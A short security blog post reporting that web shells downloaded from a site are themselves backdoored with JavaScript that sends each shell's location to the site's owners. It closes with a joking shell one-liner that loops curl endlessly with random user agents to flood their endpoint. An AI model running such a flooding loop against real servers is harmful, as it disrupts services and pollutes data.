shady shells

Jun 21, 2016  


I was in need of some web shells for some security research I was conducting. I found which has a nice selection of shells that can be downloaded to accomodate my need to test some malicious PHP code in my application.


As expected every shell on is backdoored (backdoor the backdoors eh?). bd

This code is found at the bottom of EVERY shell supplied by These scripts are inherently to not be trusted or run on your web server as they are often backdoored and do all kinds of other nasty things. They are used by bad actors to view, modify, and often upload more files to compromised PHP web applications. The javascript found in each of the supplied web shells is sending the location of each web shell to the owners of bd

This means that when a bad actor uses a malicious web shell that was posted on the location of that shell is sent to the owners of From here the owners of likely automatically upload additional malicious code. This is very common and clearly points out that there is no honor among script kiddies.

I hope that they sanitize their input and check that itโ€™s actually a valid URL ๐Ÿ™‚

$ while true; do curl -A butts$RANDOM; done